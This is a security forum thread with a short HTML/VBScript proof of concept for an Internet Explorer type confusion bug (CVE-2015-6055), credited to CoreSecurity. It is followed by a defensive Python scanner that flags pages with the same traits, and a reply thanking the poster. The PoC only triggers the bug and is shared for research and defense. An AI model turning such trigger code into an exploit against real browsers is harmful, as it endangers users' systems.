
Thread: Internet Explorer VBScript Filter Type Confusion Vulnerability (CVE-2015-6055)

  1. #1

    Internet Explorer VBScript Filter Type Confusion Vulnerability (CVE-2015-6055)

    Code:
    <html>
    
    <head>
        <meta http-equiv="x-ua-compatible" content="IE=10">
        <title>First PoC for MS15-106</title>
    </head>
    
    <body>
        <script type="text/vbscript">
            Function show_var_type(arg)
                Dim result
                '&H2011 = &H2000 (vbArray) | &H11 (vbByte)
                MsgBox(Hex(VarType(arg)))
                result = Filter(arg, "w00tw00t", 1, 1)
            End Function
        </script>
        <script type="text/javascript">
            function triggerjs() {
                var xmlhttp = new XMLHttpRequest();
                xmlhttp.open("GET", "/some_data", false);
                xmlhttp.send();
                /* XMLHttpRequest.responseBody is a VBArray object containing the raw bytes. */
                return xmlhttp.responseBody;
            }
        </script>
        <form> <input type="button" value="PoC" name="conjs" onClick="javascript:show_var_type(triggerjs())" /> </form>
    </body>
    
    </html>
    Reference : CoreSecurity
    Garage4Hackers bugs for the community , of the community

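A defender-side sketch, added here and not part of the original post or of the referenced advisory: a static scanner that flags pages combining the traits visible in the markup above (a pinned legacy document mode, a VBScript block calling Filter, and script access to XMLHttpRequest.responseBody). Class, function and label names are this example's own, and it assumes document modes 10 and below are the ones in which Internet Explorer still runs VBScript.

```python
import re
from html.parser import HTMLParser

class TraitScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.docmode = None      # document mode pinned via X-UA-Compatible, if any
        self.vbs = []            # bodies of VBScript <script> blocks
        self.xhr_binary = False  # another script reads XMLHttpRequest.responseBody
        self._kind = None        # "vbs" / "other" while inside <script>

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "").lower() for k, v in attrs}
        if tag == "meta" and a.get("http-equiv") == "x-ua-compatible":
            m = re.search(r"ie\s*=\s*(?:emulateie)?(\d+)", a.get("content", ""))
            self.docmode = int(m.group(1)) if m else None
        elif tag == "script":
            is_vbs = "vbscript" in a.get("type", "") + a.get("language", "")
            self._kind = "vbs" if is_vbs else "other"
            self.vbs += [""] if is_vbs else []

    def handle_data(self, data):
        if self._kind == "vbs":
            self.vbs[-1] += data
        elif self._kind == "other" and ".responsebody" in data.lower():
            self.xhr_binary = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._kind = None

def scan(html):
    """Return heuristic labels for the traits found in one HTML document."""
    p = TraitScanner()
    p.feed(html)
    p.close()
    hits = []
    if p.docmode is not None and p.docmode <= 10:  # assumption: modes <= 10 run VBScript
        hits.append("legacy-docmode")
    if any(re.search(r"\bFilter\s*\(", b, re.I) for b in p.vbs):
        hits.append("vbscript-filter")
    if p.xhr_binary:
        hits.append("xhr-responsebody")
    return hits

# Constructed samples: the first has the same traits as the posted page, the second has none.
SUSPECT = ('<meta http-equiv="x-ua-compatible" content="IE=10">'
           '<script type="text/vbscript">Function f(a)\n r = Filter(a, "x", 1, 1)\nEnd Function</script>'
           '<script>function g(x) { return x.responseBody; }</script>')
BENIGN = ('<meta http-equiv="X-UA-Compatible" content="IE=edge">'
          '<script>var w = ["a"].filter(function (v) { return v; });</script>')
```

Each label alone is common on old intranet pages; the three together on one page are what is worth a closer look in proxy or mail-gateway content inspection.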

  2. #2
    ... I am no Expert b0nd.g4h@gmail.com
    Join Date: Jul 2010 | Location: irc.freenode.net #g4h | Posts: 744
    This is a really marvelous piece of work done by the researcher. Thanks for sharing it here [s].
    [*] To follow the path: look to the master, follow the master, walk with the master, see through the master,
    ------> become the master!!! <------
    [*] Everyone has a will to WIN but very few have the will to prepare to WIN
    [*] Invest yourself in everything you do, there's fun in being serious
